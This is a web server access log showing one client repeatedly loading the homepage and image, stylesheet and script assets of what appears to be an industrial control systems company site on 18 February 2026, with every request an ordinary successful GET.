- GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:51:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10539] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:54:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10542] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:55:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10539] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" 